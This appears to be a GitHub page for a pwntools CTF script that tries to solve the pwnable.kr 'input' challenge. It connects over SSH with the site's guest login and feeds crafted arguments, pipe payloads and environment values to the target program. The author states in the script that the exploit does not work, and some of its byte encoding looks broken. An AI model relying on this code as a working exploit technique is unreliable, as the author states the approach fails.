-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathremote_exploit.py
49 lines (39 loc) · 1.24 KB
/
remote_exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
from pwn import *
from os import pipe, write
"""
This exploit doesn't work cause it is remote exploit.
I can't send data to pipe properly and set env variables too.
"""
def exploit():
s = ssh(user='input2', host='pwnable.kr', password='guest', port=2222)
args = pass_stage1()
r1, r2 = pass_stage2()
env = pass_stage3()
print(env)
p = s.process(executable='./input', argv=args, stdin=r1, stderr=r2, env=env)
print(p.recv().decode('utf-8'))
def pass_stage1():
# Function to pass stage one
# Generate the argv for process
args = [p8(0x90) for i in range(100)]
# First argument is name of program which process will execute
args[0] = './input'
# From source code we have two conditions:
args[ord('A')] = p8(0x00)
args[ord('B')] = p8(0x20) + p16(0x0d0a)
return args
def pass_stage2():
# Function to pass stage two
# Create first step in bypass
stdin_payload = p32(0xff000a00)
# Second step
stderr_payload = p32(0xff020a00)
r1, w1 = os.pipe()
r2, w2 = os.pipe()
os.write(w1, stdin_payload)
os.write(w2, stderr_payload)
return r1, r2
def pass_stage3():
return {'\xde\xad\xbe\xef'.encode(): '\xca\xfe\xba\xbe'.encode()}
if __name__=='__main__':
exploit()